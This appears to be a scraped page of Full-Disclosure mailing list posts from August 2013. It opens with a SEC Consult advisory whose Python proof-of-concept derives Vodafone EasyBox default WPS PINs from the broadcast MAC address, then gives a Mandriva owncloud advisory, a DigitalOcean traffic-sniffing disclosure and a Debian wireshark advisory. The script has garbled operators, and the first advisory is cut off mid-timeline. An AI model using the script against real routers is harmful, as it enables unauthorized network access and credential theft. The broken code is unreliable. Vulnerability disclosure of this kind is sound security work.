[Full-disclosure] SEC Consult SA-20130805-0 :: Vodafone EasyBox Default WPS PIN Algorithm Weakness
SEC Consult Vulnerability Lab Security Advisory 20130805-0
===
title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 EasyBox 803
vulnerable version: EasyBox 802 - all versions
EasyBox 803 - Production date before August 2011
fixed version: EasyBox 802 - no vendor patch available
EasyBox 803 - Production date after August 2011
impact: Critical
homepage: http://www.vodafone.de
found: 2012-12-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
===
Vendor/product description:
-
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.
Vulnerability overview/description:
---
The algorithm that generates the default WPS-PIN is entirely based on the MAC
address (=BSSID) and serial number of the device. The serial number can be
derived from the MAC address.
An unauthenticated attacker within the range of the access point can capture
the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN
for it. This PIN can then be used to retrieve the current access point
configuration (including the WPA passphrase) or to change the configuration
(SSID, encryption method, passphrase, ...) of the access point.
An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.
Proof of concept:
-
A script that implements the derivation algorithm has been developed:
#!/usr/bin/env python
import sys, re
def gen_pin (mac_str, sn):
mac_int = [int(x, 16) for x in mac_str]
sn_int = [0]*5+[int(x) for x in sn[5:]]
hpin = [0] * 7
k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) 0xF
k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) 0xF
hpin[0] = k1 ^ sn_int[9];
hpin[1] = k1 ^ sn_int[8];
hpin[2] = k2 ^ mac_int[9];
hpin[3] = k2 ^ mac_int[10];
hpin[4] = mac_int[10] ^ sn_int[9];
hpin[5] = mac_int[11] ^ sn_int[8];
hpin[6] = k1 ^ sn_int[7];
pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3],
hpin[4], hpin[5],
hpin[6]), 16) % 1000
# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source
(wps_pin_checksum) or
#
http://download.microsoft.com/download/a/f/7/afe5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
accum = 0
t = pin
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
return '%i%i' % (pin, (10 - accum % 10) % 10)
def main():
if len(sys.argv) != 2:
sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py
38:22:9D:11:22:33\n')
mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
if len(mac_str) != 12:
sys.exit('check MAC format!\n')
sn = 'R%05i' % int(mac_str[8:12], 16)
print 'derived serial number:', sn
print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6],
mac_str[7], mac_str[8],
mac_str[9], sn[5], sn[9])
print 'WPS pin:', gen_pin(mac_str, sn)
if __name__ == __main__:
main()
Vulnerable / tested versions:
-
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.
According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011
Vendor contact timeline:
2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datensch...@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted
channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from csirt...@vodafone.com
and du-de-zv-mxl-csirt...@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives
information about some newer devices which are not affected,
mentions that customers have already been notified to change
default
[Full-disclosure] [ MDVSA-2013:206 ] owncloud
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2013:206 http://www.mandriva.com/en/support/security/ ___ Package : owncloud Date: August 5, 2013 Affected: Business Server 1.0 ___ Problem Description: Updated owncloud package fixes security vulnerabilities: XSS vulnerability in Share Interface (oC-SA-2013-029). Authentication bypass in user_webdavauth (oC-SA-2013-030). This update provides OwnCloud 5.0.9, which fixes these issues, as well as several other bugs. ___ References: http://advisories.mageia.org/MGASA-2013-0220.html ___ Updated Packages: Mandriva Business Server 1/X86_64: e0002c36d706bf722fc3ea2aea7085d4 mbs1/x86_64/owncloud-5.0.9-1.1.mbs1.noarch.rpm 2a1eb6dc1a3e554812ff9893a8ce42fa mbs1/SRPMS/owncloud-5.0.9-1.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFR/4EWmqjQ0CJFipgRAjr8AKC7Ra8fw9FjT5/o55ghuZK8JPl5agCgvmRG QfXHOAlpH8rmYCJu2ibM/Ow= =jFDE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Potential security flaw in network implementation at Digitalocean.com
Hi, Today, I discovered that a certain large ISP specializing in cloud hosting ( digitalocean.com), has misconfigured their network in a way that allows for anyone to monitor customer network traffic. Per the guidelines of responsible disclosure, I have informed the ISP in question both when I first noticed the issue, and also before going public with the information. As I am sure some of this info has already trickled out (or is perhaps already common knowledge - if so, I apologize), I feel it is paramount to get this information out there, so that customers and others who feel this is not something they want, can act accordingly (or at least take counter-measures to protect their information). What happened: I ordered a cloud vps (a very affordable one at that, I must say) at digitalocean.com, using the NYC node. During the process of checking MySQL replication between master and slave, I noticed there was a lot of background noise in tcpdump. I kept looking and when I eliminated the ports I was using, what was left was somewhat worrying. It seems DigitalOcean has, using KVM and libvirt per their own recognition, put the libvirt-interface in an overly large bridge, and then kept applying more and more networks (multiple /24, it seems). While this might be a convenient way of assigning new networks to an ever-growing customer stock, it also sort of turns the entire thing into an amateur radio station (using the word amateur here to denote the activity, not the skill level of Digitalocean staff!). I want to make one thing clear. This is one of the better cloud shops I have used (and I have used a lot). They seem to have excellent support, provide what they claim to provide, and my billing there so far amounts to less than a dollar (even though I've fiddled with lots of stuff). HOWEVER, this does not mean that I want to be able to read what goes on with various mail, ircd, web and Microsoft sql servers, in networks far outside of my logical reach, as a customer with one IPv4. I am not an angry ex-customer. I will keep using their services, if this is fixed. Which is exactly why I am sending this email. I hope that it might add extra motivation, before someone gets their environment hacked. The way it is now, anyone even remotely interested, could fire up a VPS in less than a minute, and have full sniffing capabilities with hundreds (if not thousands) of servers. All while customers are using said servers to develop what I can only assume is important enough to host in a cloud. I will not paste logs as that would add nothing to my disclosure, more than a possibility to exploit innocent users. I wish to encourage the community to take a few steps back and not engage in target practice, while Digitalocean undoubtedly remedies this situation (I have been in contact with them repeatedly before coming here). I hope that this helps, for whatever it's worth. I will happily answer any followups, as long as they do not include requests for additional probes. This is where my involvement ends. I leave this information in the hands of the community, and Digitalocean (who I hope reads this list). Best Regards, -- Johan Boger ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2734-1] wireshark security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2734-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff August 05, 2013http://www.debian.org/security/faq - - Package: wireshark Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-4930 CVE-2013-4932 CVE-2013-4933 CVE-2013-4934 CVE-2013-4935 Multiple vulnerabilities were discovered in the dissectors for DVB-CI, GSM A Common and ASN.1 PER and in the Netmon file parser. For the oldstable distribution (squeeze), these problems have been fixed in version 1.2.11-6+squeeze11. For the stable distribution (wheezy), these problems have been fixed in version 1.8.2-5wheezy5. For the unstable distribution (sid), these problems have been fixed in version 1.10.1-1. We recommend that you upgrade your wireshark packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlH/zrkACgkQXm3vHE4uylrlNgCgy3VC5Pp9JIEopwRluMPBrMi4 TX4AoIRxNZdumgDSR7dkg/HfPaMHjcFr =kQHX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
